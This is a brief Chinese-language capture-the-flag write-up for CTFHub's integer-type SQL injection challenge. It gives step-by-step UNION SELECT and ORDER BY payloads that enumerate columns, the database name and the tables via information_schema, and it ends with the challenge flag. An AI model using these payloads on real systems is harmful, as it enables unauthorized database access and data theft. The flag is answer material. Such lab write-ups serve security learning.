CTFHub-整数型注入-wp

整数型注入

• 由题目知此SQL注入为整数型注入，则在注入命令执行时无闭合字符
• 输入1

得到 ID=1 的正常返回结果

• 输入1+1

得到 ID=2 的正常返回结果，说明存在SQL注入

• 分别输入

  1 order by 1
  1 order by 2
  

  返回结果正常

  输入

  1 order by 3
  

  时无法返回正常值，所以可以判断该网页输出字段数为2

• 输入

  -1 union select 1,database()
  

  获取库名

• 输入

  -1 union select  1,group_concat(table_name) from information_schema.tables where table_schema='sqli'  
  

  返回sqli库中的表名

• 输入

  -1 union select 1,group_concat(flag) from sqli.flag
  

  成功获取flag

flag:ctfhub{6c19b34f58dbd7d23787358d}